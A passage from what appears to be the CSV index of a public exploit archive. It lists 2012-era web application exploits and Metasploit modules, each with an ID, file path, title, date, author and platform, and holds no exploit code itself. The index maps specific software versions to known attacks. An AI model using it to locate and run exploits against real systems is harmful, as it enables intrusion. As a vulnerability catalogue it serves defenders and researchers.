Forgery",2012-04-22,"Roberto Suggi Liverani",webapps,windows, +18768,exploits/php/webapps/18768.txt,"Mega File Manager - File Download",2012-04-22,"i2sec-Min Gi Jo",webapps,php, +18770,exploits/php/webapps/18770.txt,"vTiger CRM 5.1.0 - Local File Inclusion",2012-04-22,Pi3rrot,webapps,php, +18773,exploits/php/webapps/18773.txt,"exponentcms 2.0.5 - Multiple Vulnerabilities",2012-04-23,"Onur Yılmaz",webapps,php, +18775,exploits/php/webapps/18775.php,"WebCalendar 1.2.4 - Remote Code Execution",2012-04-23,EgiX,webapps,php, +18778,exploits/php/webapps/18778.txt,"PHP Ticket System Beta 1 - 'index.php?p' SQL Injection",2012-04-24,G13,webapps,php, +18782,exploits/php/webapps/18782.txt,"piwigo 2.3.3 - Multiple Vulnerabilities",2012-04-25,"High-Tech Bridge SA",webapps,php, +18788,exploits/php/webapps/18788.txt,"PHP Volunteer management 1.0.2 - Multiple Vulnerabilities",2012-04-26,G13,webapps,php, +18787,exploits/php/webapps/18787.txt,"WordPress Plugin Zingiri Web Shop 2.4.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-04-26,"Mehmet Ince",webapps,php, +18797,exploits/linux/webapps/18797.rb,"WebCalendar 1.2.4 - Unauthenticated Remote Code Injection (Metasploit)",2012-04-29,Metasploit,webapps,linux, +18798,exploits/php/webapps/18798.txt,"Soco CMS - Local File Inclusion",2012-04-29,"BHG Security Center",webapps,php, +18791,exploits/php/webapps/18791.txt,"WordPress 3.3.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-04-27,"Ivano Binetti",webapps,php, +18793,exploits/php/webapps/18793.txt,"Axous 1.1.0 - SQL Injection",2012-04-27,"H4ckCity Secuirty TeaM",webapps,php, +18800,exploits/php/webapps/18800.txt,"Alienvault Open Source SIEM (OSSIM) 3.1 - Multiple Vulnerabilities",2012-04-29,"Stefan Schurtz",webapps,php, +18801,exploits/php/webapps/18801.txt,"Car Portal CMS 3.0 - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,webapps,php, +18802,exploits/asp/webapps/18802.txt,"C4B XPhone UC Web 4.1.890S R1 - Cross-Site Scripting",2012-04-30,Vulnerability-Lab,webapps,asp, +18803,exploits/php/webapps/18803.txt,"Opial CMS 2.0 - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,webapps,php, +18804,exploits/php/webapps/18804.txt,"DIY CMS 1.0 Poll - Multiple Vulnerabilities",2012-04-30,Vulnerability-Lab,webapps,php, +18806,exploits/php/webapps/18806.txt,"WordPress Plugin Zingiri Web Shop 2.4.2 - Persistent Cross-Site Scripting",2012-05-01,"Mehmet Ince",webapps,php, +18814,exploits/php/webapps/18814.txt,"MyClientBase 0.12 - Multiple Vulnerabilities",2012-05-01,Vulnerability-Lab,webapps,php, +18809,exploits/php/webapps/18809.txt,"GENU CMS 2012.3 - Multiple SQL Injections",2012-05-01,Vulnerability-Lab,webapps,php, +18813,exploits/php/webapps/18813.txt,"opencart 1.5.2.1 - Multiple Vulnerabilities",2012-05-01,waraxe,webapps,php, +18815,exploits/php/webapps/18815.txt,"STRATO NewsLetter Manager - Directory Traversal",2012-05-01,"Zero X",webapps,php, +18820,exploits/php/webapps/18820.php,"OpenConf 4.11 - '/author/edit.php' Blind SQL Injection",2012-05-02,EgiX,webapps,php, +18824,exploits/cgi/webapps/18824.txt,"Websense Triton - Multiple Vulnerabilities",2012-05-02,"Ben Williams",webapps,cgi, +18822,exploits/php/webapps/18822.txt,"PHP-decoda - 'Video Tag' Cross-Site Scripting",2012-05-02,"RedTeam Pentesting",webapps,php, +18827,exploits/php/webapps/18827.txt,"Baby Gekko CMS 1.1.5c - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-05-03,LiquidWorm,webapps,php, +18828,exploits/php/webapps/18828.txt,"PluXml 5.1.5 - Local File Inclusion",2012-05-03,"High-Tech Bridge SA",webapps,php, +18832,exploits/php/webapps/18832.txt,"Symantec Web Gateway - Cross-Site Scripting",2012-05-04,B00y@,webapps,php, +18871,exploits/php/webapps/18871.txt,"Travelon Express CMS 6.2.2 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,webapps,php, +18859,exploits/hardware/webapps/18859.txt,"Belkin N150 Wireless Router - Password Disclosure",2012-05-11,"Avinash Tangirala",webapps,hardware, +18840,exploits/asp/webapps/18840.txt,"Fortinet FortiWeb Web Application Firewall - Policy Bypass",2012-05-07,"Geffrey Velasquez",webapps,asp, +18841,exploits/cgi/webapps/18841.txt,"Lynx Message Server - Multiple Vulnerabilities",2012-05-07,"Mark Lachniet",webapps,cgi, +18842,exploits/php/webapps/18842.txt,"Genium CMS 2012/Q2 - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,webapps,php, +18843,exploits/php/webapps/18843.txt,"Myre Real Estate Mobile 2012/2 - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,webapps,php, +18844,exploits/php/webapps/18844.txt,"myCare2x CMS - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,webapps,php, +18845,exploits/php/webapps/18845.txt,"PHP Agenda 2.2.8 - SQL Injection",2012-05-07,loneferret,webapps,php, +18850,exploits/php/webapps/18850.txt,"X7 Chat 2.0.5.1 - Cross-Site Request Forgery (Add Admin)",2012-05-09,DennSpec,webapps,php, +18865,exploits/php/webapps/18865.rb,"WikkaWiki 1.3.2 - Spam Logging PHP Injection (Metasploit)",2012-05-12,Metasploit,webapps,php, +18857,exploits/php/webapps/18857.txt,"Kerio WinRoute Firewall Web Server < 6 - Source Code Disclosure",2012-05-10,"Andrey Komarov",webapps,php, +18858,exploits/php/webapps/18858.txt,"eLearning server 4g - Multiple Vulnerabilities",2012-05-10,"Andrey Komarov",webapps,php, +18868,exploits/php/webapps/18868.txt,"Sockso 1.51 - Persistent Cross-Site Scripting",2012-05-12,"Ciaran McNally",webapps,php, +18872,exploits/php/webapps/18872.txt,"Proman Xpress 5.0.1 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,webapps,php, +18873,exploits/php/webapps/18873.txt,"Viscacha Forum CMS 0.8.1.1 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,webapps,php, +18874,exploits/php/webapps/18874.txt,"Free Realty 3.1-0.6 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,webapps,php, +18875,exploits/php/webapps/18875.txt,"Galette - 'picture.php' SQL Injection",2012-05-13,sbz,webapps,php, +18881,exploits/java/webapps/18881.txt,"Liferay Portal 6.0.x < 6.1 - Privilege Escalation",2012-05-13,"Jelmer Kuperus",webapps,java, +18882,exploits/php/webapps/18882.txt,"b2ePms 1.0 - Authentication Bypass",2012-05-15,"Jean Pascal Pereira",webapps,php, +18884,exploits/php/webapps/18884.txt,"S9Y Serendipity 1.6 - 'Backend' Cross-Site Scripting / SQL Injection",2012-05-08,"Stefan Schurtz",webapps,php, +18886,exploits/php/webapps/18886.txt,"Axous 1.1.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-05-16,"Ivano Binetti",webapps,php, +18888,exploits/jsp/webapps/18888.txt,"OpenKM Document Management System 5.1.7 - Command Execution",2012-01-03,"Cyrill Brunschwiler",webapps,jsp, +18889,exploits/php/webapps/18889.txt,"Artiphp CMS 5.5.0 - Database Backup Disclosure",2012-05-16,LiquidWorm,webapps,php, +18899,exploits/php/webapps/18899.txt,"PHP Address Book 7.0.0 - Multiple Vulnerabilities",2012-05-19,"Stefan Schurtz",webapps,php, +18900,exploits/php/webapps/18900.txt,"FreeNAC 3.02 - SQL Injection / Cross-Site Scripting",2012-05-19,blake,webapps,php, +18911,exploits/php/webapps/18911.txt,"Vanilla Forums About Me Plugin - Persistent Cross-Site Scripting",2012-05-21,"Henry Hoggard",webapps,php, +18912,exploits/php/webapps/18912.txt,"Vanilla FirstLastNames 1.3.2 Plugin - Persistent Cross-Site Scripting",2012-05-21,"Henry Hoggard",webapps,php, +18913,exploits/php/webapps/18913.php,"Supernews 2.6.1 - SQL Injection",2012-05-21,WhiteCollarGroup,webapps,php, +18908,exploits/php/webapps/18908.txt,"Vanilla Forums LatestComment 1.1 Plugin - Persistent Cross-Site Scripting",2012-05-18,"Henry Hoggard",webapps,php, +18922,exploits/php/webapps/18922.rb,"appRain CMF - Arbitrary '.PHP' File Upload (Metasploit)",2012-05-25,Metasploit,webapps,php, +18921,exploits/php/webapps/18921.txt,"Jaow 2.4.5 - Blind SQL Injection",2012-05-24,kallimero,webapps,php, +18927,exploits/php/webapps/18927.txt,"SocialEngine 4.2.2 - Multiple Vulnerabilities",2012-05-25,i4k,webapps,php, +18950,exploits/php/webapps/18950.txt,"NewsAdd 1.0 - Multiple SQL Injections",2012-05-30,WhiteCollarGroup,webapps,php, +18934,exploits/php/webapps/18934.rb,"WeBid - 'converter.php' Remote PHP Code Injection (Metasploit)",2012-05-27,Metasploit,webapps,php, +18935,exploits/php/webapps/18935.txt,"b2ePms 1.0 - Multiple SQL Injection Vulnerabilities",2012-05-27,loneferret,webapps,php, +18937,exploits/php/webapps/18937.txt,"PBBoard 2.1.4 - Local File Inclusion",2012-05-28,n4ss1m,webapps,php, +18944,exploits/php/webapps/18944.txt,"PHP Volunteer Management System 1.0.2 - Multiple SQL Injections",2012-05-28,loneferret,webapps,php, +18941,exploits/php/webapps/18941.txt,"PHP Volunteer Management System 1.0.2 - Multiple Vulnerabilities",2012-05-28,Ashoo,webapps,php, +18948,exploits/php/webapps/18948.txt,"PBBoard 2.1.4 - Multiple SQL Injections",2012-05-29,loneferret,webapps,php, +18953,exploits/php/webapps/18953.txt,"Ganesha Digital Library 4.0 - Multiple Vulnerabilities",2012-05-30,X-Cisadane,webapps,php, +18955,exploits/php/webapps/18955.txt,"Simple Web Content Management System 1.1 < 1.3 - Multiple SQL Injections",2012-05-30,loneferret,webapps,php, +18957,exploits/php/webapps/18957.rb,"PHP Volunteer Management System 1.0.2 - Arbitrary File Upload (Metasploit)",2012-05-31,Metasploit,webapps,php, +18960,exploits/php/webapps/18960.txt,"NewsAdd 1.0 - 'lerNoticia.php?id' SQL Injection",2012-05-31,"Yakir Wizman",webapps,php, +18961,exploits/php/webapps/18961.txt,"Supernews 2.6.1 - 'noticias.php?cat' SQL Injection",2012-05-31,"Yakir Wizman",webapps,php, +18970,exploits/php/webapps/18970.txt,"Membris 2.0.1 - Multiple Vulnerabilities",2012-06-01,Dr.abolalh,webapps,php, +18965,exploits/php/webapps/18965.html,"4PSA VoIPNow Professional 2.5.3 - Multiple Vulnerabilities",2012-06-01,Aboud-el,webapps,php, +18974,exploits/php/webapps/18974.txt,"Vanilla Forum Tagging Plugin Enchanced 1.0.1 - Persistent Cross-Site Scripting",2012-06-02,"Henry Hoggard",webapps,php, +18987,exploits/php/webapps/18987.php,"WordPress Plugin WP-Property 1.35.0 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",webapps,php, +18988,exploits/php/webapps/18988.php,"WordPress Plugin Marketplace Plugin 1.5.0 < 1.6.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",webapps,php, +18989,exploits/php/webapps/18989.php,"WordPress Plugin Google Maps via Store Locator 2.7.1 < 3.0.1 - Multiple Vulnerabilities",2012-06-05,"Sammy FORGIT",webapps,php, +18990,exploits/php/webapps/18990.php,"WordPress Plugin HTML5 AV Manager 0.2.7 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",webapps,php, +18991,exploits/php/webapps/18991.php,"WordPress Plugin Foxypress 0.4.1.1 < 0.4.2.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",webapps,php, +18993,exploits/php/webapps/18993.php,"WordPress Plugin Asset Manager 0.2 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",webapps,php, +18994,exploits/php/webapps/18994.php,"WordPress Plugin Font Uploader 1.2.4 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",webapps,php, +18997,exploits/php/webapps/18997.php,"WordPress Plugin MM Forms Community 2.2.6 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",webapps,php, +18998,exploits/php/webapps/18998.php,"WordPress Plugin Gallery 3.06 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",webapps,php, +18999,exploits/php/webapps/18999.php,"SN News 1.2 - 'visualiza.php' SQL Injection",2012-06-06,WhiteCollarGroup,webapps,php, +19012,exploits/php/webapps/19012.txt,"WordPress Plugin Front File Manager 0.1 - Arbitrary File Upload",2012-06-08,"Adrien Thierry",webapps,php, +19013,exploits/php/webapps/19013.txt,"WordPress Plugin Easy Contact Forms Export 1.1.0 - Information Disclosure",2012-06-08,"Sammy FORGIT",webapps,php, +19005,exploits/php/webapps/19005.txt,"SN News 1.2 - '/admin/loger.php' Authentication Bypass",2012-06-07,"Yakir Wizman",webapps,php, +19003,exploits/php/webapps/19003.txt,"vanilla kpoll plugin 1.2 - Persistent Cross-Site Scripting",2012-06-06,"Henry Hoggard",webapps,php, +19007,exploits/php/webapps/19007.php,"PHPNet 1.8 - 'ler.php' SQL Injection",2012-06-07,WhiteCollarGroup,webapps,php, +19008,exploits/php/webapps/19008.php,"WordPress Plugin Front End Upload 0.5.3 - Arbitrary File Upload",2012-06-07,"Adrien Thierry",webapps,php, +19009,exploits/php/webapps/19009.php,"WordPress Plugin Omni Secure Files 0.1.13 - Arbitrary File Upload",2012-06-07,"Adrien Thierry",webapps,php, +19016,exploits/php/webapps/19016.txt,"WordPress Plugin PICA Photo Gallery 1.0 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",webapps,php, +19029,exploits/php/webapps/19029.py,"phpAcounts 0.5.3 - SQL Injection",2012-06-08,loneferret,webapps,php, +19018,exploits/php/webapps/19018.txt,"WordPress Plugin NewsLetter 1.5 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",webapps,php, +19019,exploits/php/webapps/19019.php,"WordPress Plugin RBX Gallery 2.1 - Arbitrary File Upload",2012-06-08,"Sammy FORGIT",webapps,php, +19020,exploits/php/webapps/19020.txt,"WordPress Plugin Simple Download Button ShortCode 1.0 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",webapps,php, +19021,exploits/php/webapps/19021.txt,"WordPress Plugin Thinkun Remind 1.1.3 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",webapps,php, +19022,exploits/php/webapps/19022.txt,"WordPress Plugin TinyMCE Thumbnail Gallery 1.0.7 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",webapps,php, +19023,exploits/php/webapps/19023.php,"WordPress Plugin wpStoreCart 2.5.27-2.5.29 - Arbitrary File Upload",2012-06-08,"Sammy FORGIT",webapps,php, +19011,exploits/php/webapps/19011.txt,"Webspell FIRSTBORN Movie-Addon - Blind SQL Injection",2012-06-08,"Easy Laster",webapps,php, +19031,exploits/php/webapps/19031.txt,"Webspell dailyinput Movie Addon 4.2.x - SQL Injection",2012-06-10,"Easy Laster",webapps,php, +19035,exploits/php/webapps/19035.txt,"freepost 0.1 r1 - Multiple Vulnerabilities",2012-06-10,"ThE g0bL!N",webapps,php, +19036,exploits/php/webapps/19036.php,"WordPress Plugin Content Flow 3D 1.0.0 - Arbitrary File Upload",2012-06-10,g11tch,webapps,php, +19038,exploits/php/webapps/19038.rb,"Symantec Web Gateway 5.0.2.8 - Arbitrary '.PHP' File Upload (Metasploit)",2012-06-10,Metasploit,webapps,php, +19050,exploits/php/webapps/19050.txt,"WordPress Plugin wp-gpx-map 1.1.21 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",webapps,php, +19051,exploits/php/webapps/19051.txt,"ClanSuite 2.9 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",webapps,php, +19052,exploits/php/webapps/19052.txt,"WordPress Plugin User Meta 1.1.1 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",webapps,php, +19053,exploits/php/webapps/19053.txt,"WordPress Plugin Top Quark Architecture 2.10 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",webapps,php, +19054,exploits/php/webapps/19054.txt,"WordPress Plugin SfBrowser 1.4.5 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",webapps,php, +19055,exploits/php/webapps/19055.txt,"WordPress Plugin Pica Photo Gallery 1.0 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",webapps,php, +19056,exploits/php/webapps/19056.txt,"WordPress Plugin Mac Photo Gallery 2.7 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",webapps,php, +19057,exploits/php/webapps/19057.txt,"WordPress Plugin drag and drop file upload 0.1 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",webapps,php, +19058,exploits/php/webapps/19058.txt,"WordPress Plugin Custom Content Type Manager 0.9.5.13-pl - Arbitrary File Upload",2012-06-11,"Adrien Thierry",webapps,php, +19059,exploits/php/webapps/19059.php,"Agora-Project 2.12.11 - Arbitrary File Upload",2012-06-11,Misa3l,webapps,php, +19060,exploits/php/webapps/19060.php,"TheBlog 2.0 - Multiple Vulnerabilities",2012-06-11,WhiteCollarGroup,webapps,php, +19065,exploits/php/webapps/19065.rb,"Symantec Web Gateway 5.0.2.8 - 'ipchange.php' Command Injection (Metasploit)",2012-06-12,Metasploit,webapps,php, +19154,exploits/php/webapps/19154.py,"qdPM 7 - Arbitrary File upload",2012-06-14,loneferret,webapps,php, +19100,exploits/php/webapps/19100.rb,"WordPress Plugin Foxypress - 'Uploadify.php' Arbitrary Code Execution (Metasploit)",2012-06-13,Metasploit,webapps,php, +19386,exploits/php/webapps/19386.txt,"UCCASS 1.8.1 - Blind SQL Injection",2012-06-24,dun,webapps,php, +19132,exploits/php/webapps/19132.txt,"Myre Real Estate Mobile 2012 - Multiple Vulnerabilities",2012-06-14,Vulnerability-Lab,webapps,php, +19133,exploits/php/webapps/19133.txt,"Cells Blog CMS 1.1 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,webapps,php, +19134,exploits/php/webapps/19134.txt,"Swoopo Gold Shop CMS 8.4.56 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,webapps,php, +19135,exploits/php/webapps/19135.txt,"Squirrelcart Cart Shop 3.3.4 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,webapps,php, +19174,exploits/php/webapps/19174.py,"Useresponse 1.0.2 - Privilege Escalation / Remote Code Execution",2012-06-15,mr_me,webapps,php, +40432,exploits/hardware/webapps/40432.txt,"TP-Link Archer CR-700 - Cross-Site Scripting",2016-09-27,"Ayushman Dutta",webapps,hardware, +19178,exploits/php/webapps/19178.txt,"webo site speedup 1.6.1 - Multiple Vulnerabilities",2012-06-16,dun,webapps,php, +19179,exploits/php/webapps/19179.txt,"PHP Decoda 3.3.1 - Local File Inclusion",2012-06-16,"Number 7",webapps,php, +19180,exploits/php/webapps/19180.txt,"News Script PHP 1.2 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,webapps,php, +19185,exploits/hardware/webapps/19185.txt,"Huawei HG866 - Authentication Bypass",2012-06-16,hkm,webapps,hardware, +19187,exploits/php/webapps/19187.txt,"WordPress Plugin Automatic 2.0.3 - SQL Injection",2012-06-16,nick58,webapps,php, +19188,exploits/php/webapps/19188.txt,"Nuked Klan SP CMS 4.5 - SQL Injection",2012-06-16,Vulnerability-Lab,webapps,php, +19189,exploits/php/webapps/19189.txt,"iScripts EasyCreate 2.0 - Multiple Vulnerabilities",2012-06-16,Vulnerability-Lab,webapps,php, +43150,exploits/hardware/webapps/43150.html,"Vonage VDV23 - Cross-Site Scripting",2017-11-16,Nu11By73,webapps,hardware, +19263,exploits/hardware/webapps/19263.txt,"QNAP Turbo NAS 3.6.1 Build 0302T - Multiple Vulnerabilities",2012-06-18,"Sense of Security",webapps,hardware, +19264,exploits/php/webapps/19264.txt,"MyTickets 1.x < 2.0.8 - Blind SQL Injection",2012-06-18,al-swisre,webapps,php, +19292,exploits/php/webapps/19292.txt,"iBoutique eCommerce 4.0 - Multiple Web Vulnerabilities",2012-06-19,Vulnerability-Lab,webapps,php, +19294,exploits/php/webapps/19294.txt,"WordPress Plugin Schreikasten 0.14.13 - Cross-Site Scripting",2012-06-20,"Henry Hoggard",webapps,php, +19406,exploits/linux/webapps/19406.txt,"symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities",2012-06-27,"S2 Crew",webapps,linux, +19321,exploits/windows/webapps/19321.txt,"IBM System Storage DS Storage Manager Profiler - Multiple Vulnerabilities",2012-06-21,LiquidWorm,webapps,windows, +19324,exploits/php/webapps/19324.txt,"traq 2.3.5 - Multiple Vulnerabilities",2012-06-21,AkaStep,webapps,php, +19325,exploits/php/webapps/19325.txt,"Commentics 2.0 - Multiple Vulnerabilities",2012-06-21,"Jean Pascal Pereira",webapps,php, +19329,exploits/php/webapps/19329.txt,"agora project 2.13.1 - Multiple Vulnerabilities",2012-06-22,"Chris Russell",webapps,php, +19330,exploits/php/webapps/19330.txt,"LimeSurvey 1.92+ build120620 - Multiple Vulnerabilities",2012-06-22,dun,webapps,php, +19339,exploits/windows/webapps/19339.txt,"SoftPerfect Bandwidth Manager 2.9.10 - Authentication Bypass",2012-06-22,Gitsnik,webapps,windows, +19394,exploits/asp/webapps/19394.txt,"Parodia 6.8 - 'employer-profile.asp' SQL Injection",2012-06-25,"Carlos Mario Penagos Hollmann",webapps,asp, +19398,exploits/php/webapps/19398.txt,"WordPress Plugin Fancy Gallery 1.2.4 - Arbitrary File Upload",2012-06-25,"Sammy FORGIT",webapps,php, +19408,exploits/php/webapps/19408.txt,"Zend Framework < 2.0.0 beta4 < 1.12 RC1 < 1.11.11 - Local File Disclosure",2012-06-27,"SEC Consult",webapps,php, +19403,exploits/php/webapps/19403.rb,"SugarCRM CE 6.3.1 - 'Unserialize()' PHP Code Execution (Metasploit)",2012-06-26,Metasploit,webapps,php, +19431,exploits/php/webapps/19431.txt,"webERP 4.08.1 - Local/Remote File Inclusion",2012-06-28,dun,webapps,php, +19432,exploits/jsp/webapps/19432.rb,"Openfire Server 3.6.0a - Admin Console Authentication Bypass (Metasploit)",2012-06-28,Metasploit,webapps,jsp, +19452,exploits/php/webapps/19452.txt,"phpmoneybooks 1.03 - Persistent Cross-Site Scripting",2012-06-29,chap0,webapps,php, +19455,exploits/windows/webapps/19455.txt,"specview 2.5 build 853 - Directory Traversal",2012-06-29,"Luigi Auriemma",webapps,windows, +19481,exploits/php/webapps/19481.txt,"WordPress Plugin Paid Business Listings 1.0.2 - Blind SQL Injection",2012-06-30,"Chris Kellum",webapps,php, +19793,exploits/php/webapps/19793.txt,"Magento eCommerce - Local File Disclosure",2012-07-13,"SEC Consult",webapps,php, +19524,exploits/php/webapps/19524.txt,"WordPress Plugin Backup 2.0.1 - Information Disclosure",2012-07-02,"Stephan Knauss",webapps,php, +19525,exploits/windows/webapps/19525.txt,"Microsoft IIS - Short File/Folder Name Disclosure",2012-07-02,"Soroush Dalili",webapps,windows, +19526,exploits/hardware/webapps/19526.rb,"WANGKONGBAO CNS-1000 UTM IPS-FW - Directory Traversal (Metasploit)",2012-07-02,"Dillon Beresford",webapps,hardware, +19548,exploits/php/webapps/19548.txt,"gpEasy CMS Minishop 1.5 Plugin - Persistent Cross-Site Scripting",2012-07-03,"Carlos Mario Penagos Hollmann",webapps,php, +19549,exploits/php/webapps/19549.txt,"CLscript Classified Script 3.0 - SQL Injection",2012-07-03,"Daniel Godoy",webapps,php, +19550,exploits/php/webapps/19550.txt,"phpMyBackupPro 2.2 - Local File Inclusion",2012-07-03,dun,webapps,php, +19572,exploits/php/webapps/19572.txt,"WordPress Plugin MoodThingy Widget 0.8.7 - Blind SQL Injection",2012-07-04,"Chris Kellum",webapps,php, +19573,exploits/php/webapps/19573.php,"Tiki Wiki CMS Groupware 8.3 - 'Unserialize()' PHP Code Execution",2012-07-04,EgiX,webapps,php, +19574,exploits/php/webapps/19574.txt,"Webify Link Directory - SQL Injection",2012-07-04,"Daniel Godoy",webapps,php, +19597,exploits/php/webapps/19597.txt,"Guestbook Scripts PHP 1.5 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,webapps,php, +19598,exploits/php/webapps/19598.txt,"Freeside SelfService CGI/API 2.3.3 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,webapps,php, +19600,exploits/php/webapps/19600.txt,"CLscript CMS 3.0 - Multiple Vulnerabilities",2012-07-05,Vulnerability-Lab,webapps,php, +30094,exploits/php/webapps/30094.txt,"DGNews 2.1 - 'footer.php' Cross-Site Scripting",2007-05-28,"Jesper Jurcenoks",webapps,php, +19626,exploits/php/webapps/19626.txt,"sflog! 1.00 - Multiple Vulnerabilities",2012-07-06,dun,webapps,php, +19628,exploits/php/webapps/19628.txt,"Event Script PHP 1.1 CMS - Multiple Vulnerabilities",2012-07-06,Vulnerability-Lab,webapps,php, +19629,exploits/php/webapps/19629.txt,"Webmatic 3.1.1 - Blind SQL Injection",2012-07-06,"High-Tech Bridge SA",webapps,php, +19630,exploits/php/webapps/19630.rb,"Tiki Wiki CMS Groupware 8.3 - 'Unserialize()' PHP Code Execution (Metasploit)",2012-07-09,Metasploit,webapps,php, +19631,exploits/php/webapps/19631.rb,"Basilic 1.5.14 - 'diff.php' Arbitrary Command Execution (Metasploit)",2012-07-09,Metasploit,webapps,php, +19671,exploits/windows/webapps/19671.rb,"Umbraco CMS - Remote Command Execution (Metasploit)",2012-07-09,Metasploit,webapps,windows, +19715,exploits/php/webapps/19715.txt,"WordPress Plugin WP-Predict 1.0 - Blind SQL Injection",2012-07-10,"Chris Kellum",webapps,php, +19758,exploits/php/webapps/19758.rb,"Hastymail 2.1.1 RC1 - Command Injection (Metasploit)",2012-07-12,Metasploit,webapps,php, +19768,exploits/php/webapps/19768.txt,"House Style 0.1.2 - 'readfile()' Local File Disclosure",2012-07-12,GoLd_M,webapps,php, +19769,exploits/php/webapps/19769.txt,"eCan 0.1 - Local File Disclosure",2012-07-12,GoLd_M,webapps,php, +19771,exploits/php/webapps/19771.txt,"Lc Flickr Carousel 1.0 - Local File Disclosure",2012-07-12,GoLd_M,webapps,php, +19774,exploits/hardware/webapps/19774.txt,"TP-Link Gateway 3.12.4 - Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,webapps,hardware, +19775,exploits/php/webapps/19775.txt,"Reserve Logic 1.2 Booking CMS - Multiple Vulnerabilities",2012-07-12,Vulnerability-Lab,webapps,php, +19790,exploits/php/webapps/19790.txt,"webpagetest 2.6 - Multiple Vulnerabilities",2012-07-13,dun,webapps,php, +19791,exploits/php/webapps/19791.txt,"WordPress Plugin Resume Submissions & Job Postings 2.5.1 - Unrestricted Arbitrary File Upload",2012-07-13,"Chris Kellum",webapps,php, +19792,exploits/php/webapps/19792.txt,"Joomla! Component com_ksadvertiser - Remote File / Bypass Upload",2012-07-13,D4NB4R,webapps,php, +19825,exploits/php/webapps/19825.php,"Shopware 3.5 - SQL Injection",2012-07-14,Kataklysmos,webapps,php, +19964,exploits/php/webapps/19964.txt,"PHP-Nuke module (SPChat) - SQL Injection",2012-07-20,"Yakir Wizman",webapps,php, +19829,exploits/php/webapps/19829.txt,"Joomla! Component com_osproperty 2.0.2 - Unrestricted Arbitrary File Upload",2012-07-14,D4NB4R,webapps,php, +19859,exploits/hardware/webapps/19859.txt,"Vivotek Cameras - Sensitive Information Disclosure",2012-07-16,GothicX,webapps,hardware, +19862,exploits/php/webapps/19862.pl,"WordPress Theme Diary/Notebook Site5 - Email Spoofing",2012-07-16,bwall,webapps,php, +19863,exploits/php/webapps/19863.txt,"CakePHP 2.x < 2.2.0-RC2 - XML External Entity Injection",2012-07-16,"Pawel Wylecial",webapps,php, +19864,exploits/php/webapps/19864.txt,"VamCart CMS 0.9 - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,webapps,php, +19865,exploits/php/webapps/19865.txt,"PBBoard CMS 2.1.4 - Multiple Vulnerabilities",2012-07-16,Vulnerability-Lab,webapps,php, +19898,exploits/php/webapps/19898.txt,"Forum Oxalis 0.1.2 - SQL Injection",2012-07-17,"Jean Pascal Pereira",webapps,php, +20010,exploits/php/webapps/20010.txt,"X-Cart Gold 4.5 - 'products_map.php?symb' Cross-Site Scripting",2012-07-21,muts,webapps,php, +19927,exploits/php/webapps/19927.html,"Nwahy Articles 2.2 - Cross-Site Request Forgery (Add Admin)",2012-07-18,DaOne,webapps,php, +19985,exploits/php/webapps/19985.txt,"iBoutique 4.0 - 'key' SQL Injection",2012-07-20,"SecPod Research",webapps,php, +20011,exploits/windows/webapps/20011.js,"SolarWinds Orion Network Performance Monitor 10.2.2 - Multiple Vulnerabilities",2012-07-21,muts,webapps,windows, +20029,exploits/php/webapps/20029.rb,"EGallery - Arbitrary '.PHP' File Upload (Metasploit)",2012-07-23,Metasploit,webapps,php, +20033,exploits/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 - 'statusFilter.php?q' SQL Injection",2012-07-22,muts,webapps,php, +20035,exploits/asp/webapps/20035.js,"ipswitch whatsup gold 15.02 - Persistent Cross-Site Scripting / Blind SQL Injection / Remote Code Execution",2012-07-22,muts,webapps,asp, +20037,exploits/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel - SQL Root Password Disclosure",2012-07-23,Ciph3r,webapps,linux, +20038,exploits/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 - 'blocked.php?id' Blind SQL Injection",2012-07-23,muts,webapps,linux, +20044,exploits/php/webapps/20044.txt,"Symantec Web Gateway 5.0.3.18 - Blind SQL Injection Backdoor via MySQL Triggers",2012-07-23,muts,webapps,php, +20055,exploits/php/webapps/20055.txt,"MySQL Squid Access Report 2.1.4 - HTML Injection",2012-07-23,"Daniel Godoy",webapps,php, +20062,exploits/php/webapps/20062.py,"Alienvault Open Source SIEM (OSSIM) 3.1 - Reflected Cross-Site Scripting / Blind SQL 